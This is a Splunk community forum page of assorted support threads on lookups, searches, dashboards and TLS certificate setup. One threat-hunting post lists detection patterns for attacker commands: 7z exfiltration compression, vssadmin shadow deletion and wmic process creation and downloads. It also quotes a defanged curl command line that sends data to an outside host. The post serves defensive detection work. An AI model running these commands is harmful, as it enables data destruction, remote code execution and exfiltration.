All Posts

Find Answers
Ask questions. Get answers. Find technical product solutions from passionate members of the Splunk community.

All Posts

I tried with lookup definition "WILDCARD(commands)" but that didn't work!
Hello Community! I am trying to set up a search to monitor Powershell commands from Windows hosts; specifically, I am starting from: an index with the full messages related to PS commands, contain... See more...
Hello Community! I am trying to set up a search to monitor Powershell commands from Windows hosts; specifically, I am starting from: an index with the full messages related to PS commands, contained in a field named "Message" (related, for example, to event codes 4101, 800, etc...) a .csv file, with the list of commands I would like to monitored, contained in a column named "PS_command". From these premises, I have already constructed a search that leverages on inputlookup to search the strings from the PS-monitored.csv file to the index field Message, outputting the result in a table, as the following (adding also details from the index: _time, host and EventCode).   index="wineventlog" | search ( [|inputlookup PS-monitored.csv | eval Message= "*" + PS_command + "*" | fields Message] ) | table _time host EventCode Message    This, despite not being the most elegant solution (with the addition of wildcard characters *), is currently working, however I would also like to include the original search field (PS_command column from PS-monitored.csv) to the final table. I tried to experiment a bit with lookup command, and with join options, without success; does anyone have some suggestions? Finally, I would like avoid using heavy commands, such as join, if at all possible. Thanks in advance!
To use wildcards in lookups they have to be defined as match type WILDCARD https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_looku... See more...
To use wildcards in lookups they have to be defined as match type WILDCARD https://docs.splunk.com/Documentation/Splunk/9.2.1/Knowledge/Usefieldlookupstoaddinformationtoyourevents#Create_a_CSV_lookup_definition  
Start with a search that returns the data you are interested in visualising. Do you have this already?
What do you get when you try this? index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error | rex field=message "Message=.* \((?<apiName>\w+?) -" | ... See more...
What do you get when you try this? index=application_na sourcetype=my_logs:hec source=my_Logger_PROD retrievePayments* returncode=Error | rex field=message "Message=.* \((?<apiName>\w+?) -" | chart count over client by apiName
Hello Shubham, In addition to Ryan suggestion, I'm posting more useful links for your ref if incase those may help. Please note AppDynamics moved extensions under an open-source model, to enable... See more...
Hello Shubham, In addition to Ryan suggestion, I'm posting more useful links for your ref if incase those may help. Please note AppDynamics moved extensions under an open-source model, to enable customers to directly evolve them to suit their needs / build new use cases, you can find more information  https://docs.appdynamics.com/display/PAA/Support+Advisory%3A+Changes+to+Extensions+Support+ModelWe have also documented answers to most common extension queries along with troubleshooting tips and tricks in the following links. Extensions troubleshooting Advanced Extensions Troubleshooting Best Regards, Rajesh Ganapavarapu
Need a report based on previous day  I have source ip segment xx.xx.xx.xx/28, & destination ip segment xx.xx.xx/24  outcome of query should provide below Date and start + end time of the connecti... See more...
Need a report based on previous day  I have source ip segment xx.xx.xx.xx/28, & destination ip segment xx.xx.xx/24  outcome of query should provide below Date and start + end time of the connection USERNAME APPLICATION:PORT & PROTOCOL APPLICATION SEGMENTS ACCESS POLICY NAME ACTION how can i create customized dashboard, please suggest.
It would help if you could share some anonymised raw events in a code block to prevent formatting corruptions, that way we can see what you are working with and be better able to guide you.
Try a couple of things Add the below to inputs.conf  - restart (YOUR CA CERT) under [SSL] rootCA = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem Run these to validate the certs - see if... See more...
Try a couple of things Add the below to inputs.conf  - restart (YOUR CA CERT) under [SSL] rootCA = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem Run these to validate the certs - see if they read and show information openssl rsa -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text openssl x509 -in /opt/splunk/etc/auth/mycerts/myServerCertificate.pem -text -noout  
All - I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have ioc_check table containing command strings and description as below: ... See more...
All - I am new to Splunk and trying to figure out a way to return a matched command from a CSV table with inputlookup. I have ioc_check table containing command strings and description as below: commands description 7z a -t7z -r Compress data for exfiltration vssadmin.* Delete Shadows Deletion of Shadow copy *wmic*process*call*create* Uses WMI to create processes wmic*get*http Using wmic to get and run files from internet   I am using this lookup table commands string against CrowdStrike CommandLine to hunt for any matches commands run by any user in our environment. So when the CommandLine filed from CrowdStrike logs matches any commands string from lookup table, it should generate an alert. What we are trying to achieve is when there is an alert it should also tell us the description of the matching command so we know which command matched with the CrowdStrike CommandLine. The final result should be like this: CommandLine description commands curl -g -k -H user-agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705;) --connect-timeout 5 -d status=2f8bIrZMNKpfunrfOgXZEIywAf18sgF0O6Xgo%3d --retry 0 -L http[:]//wvfg.wetmet[.]net/api/serverservice/heart.php?serverid=1u%2bYbg%2bn25POYs4MAuxnjxQMMDoNMbhWQoixYAF0bjP%2f%2fw%3d Using wmic to get and run files from internet wmic*get*http         I have come up with below search it gives me an alert but not able to display the matching command and description. Any help would be much appreciated! index=crowdstrike event_simpleName=ProcessRollup2 [| inputlookup ioc_check | eval CommandLine="*"+commands+"*" | fields CommandLine] | lookup ioc_check commands OUTPUT description | table _time, CommandLine, description, commands
Hmm. I still get the same error. Certs permissions:   After restart, Splunkd.log:  
Other attributes that *may* distinguish a report include alert.track and alert_condition, but I've found alert_type to be the best. You won't find this information documented.  It's tribal knowledge... See more...
Other attributes that *may* distinguish a report include alert.track and alert_condition, but I've found alert_type to be the best. You won't find this information documented.  It's tribal knowledge and now you're part of the tribe.    Seriously, you can use your browser's console to view the REST commands sent for the UI's Searches, Reports, and Alerts dashboard to see how the two types are differentiated.
Hello, I'm still new to SPLUNK and still learning so apologies for any incorrect naming  I have a search in SPLUNK that runs daily and does some filtering to then lookup an indexed .csv for addi... See more...
Hello, I'm still new to SPLUNK and still learning so apologies for any incorrect naming  I have a search in SPLUNK that runs daily and does some filtering to then lookup an indexed .csv for additional information. The indexed .csv is injected into SPLUNK daily and the files are called: "YYYY-MM-DD Report.csv".  The search is supposed to take that into consideration and look at the latest report based on the date in the subject. It currently looks like this: | rename Letter as C1111 | table A1111, B1111, C1111 | join type=left C1111 [ search earliest=-24h host="AAA" index="BBB" sourcetype="CCC" | eval dateFile=strftime(now(), "%Y-%m-%d") | where like(source,"%".dateFile."%Report.csv") | rename "Number" as C1111 | eval C1111=lower(C1111) | fields C1111, "1 xxxx","2 yyyy","3 zzzz"] | table A1111, B1111, C1111, "1 xxxx","2 yyyy","3 zzzz" This used to work but has stopped a few days back and I'm unable to figure out what the issue might be. 
From the screenshot of files permissions  - the files look like they are for root, set those for the splunk user and try that  
Hi @Zazou , apps.splunk.com should be sufficient to download apps, but anyway, you can do this from your workstation, without openeing any firewall route (that's better!) Ciao. Giuseppe
Hi guys! I'm trying to allow Splunk to access the internet to browse and download apps. So far I have opened up "apps.splunk.com" and "splunkbase.splunk.com", but it doesn't seem to do the trick. An... See more...
Hi guys! I'm trying to allow Splunk to access the internet to browse and download apps. So far I have opened up "apps.splunk.com" and "splunkbase.splunk.com", but it doesn't seem to do the trick. Any other URL's I need to allow?
Tried that already, no dice.
Try this for starters  blacklist1 = EventCode="4663" Message="Account Name:\s+COMPUTER8-55\$"  
Hiu @SplunkerNoob , as I said, see in the Security Essentials App and you'll find hundreds of searches also fro threat  hunting. Ciao. giuseppe
Hello. Im new at Splunk. Recently, I am trying to create and sign my own TLS certificates, following this official guide. https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/Howtoself-signcer... See more...
Hello. Im new at Splunk. Recently, I am trying to create and sign my own TLS certificates, following this official guide. https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/Howtoself-signcertificates However, splunkd.log keep on showing this error: Error setting up SSL for TCP data input from file=inputs.conf stanza="SSL": Can't read key file /opt/splunk/etc/auth/mycerts/myServerCertificate.pem SSL error code=151441516 message="error:0906D06C:PEM routines:PEM_read_bio:no start line"   First, By following the guide, I created: private key of root certificate authority certificate, which is myCertAuthPrivateKey.key CSR for the certificate, which is myCertAuthCertificate.csr root certificate authority certificate, which is myCertAuthCertificate.pem Moreover, I created a server certificate and sign them with the root certificate authority certificate. private key for the server certificate, which is myServerPrivateKey.key CSR for the server certificate, which is myServerCertificate.csr Server certificate, which is myServerCertificate.pem   Basically, following the guide, i have 6 files in mycerts folder, and one srl file. This Splunk Master is a master node connects to 3 indexers (clustering). I followed this guide to modify the configuration files, which is the inputs.conf and server.conf i believe. Ref: https://docs.splunk.com/Documentation/Splunk/9.2.1/Security/ConfigureSplunkforwardingtousesignedcertificates 6+1 files for certificate. /opt/splunk/etc/system/local/server.conf [general] ... [sslConfig] sslRootCAPath = /opt/splunk/etc/auth/mycerts/myCertAuthCertificate.pem sslPassword = mypassword ... /opt/splunk/etc/system/local/inputs.conf [splunktcp-ssl:9997] disabled=0 [SSL] serverCert = /opt/splunk/etc/auth/mycerts/myServerCertificate.pem sslPassword = mypassword requireClientCert = true sslVersions = *,-ssl2 Everytime i do service splunk restart, i still get the SSL error. Anyone know why and whats happening?? Same error is also happening in any other indexes. (same steps as i mentioned above)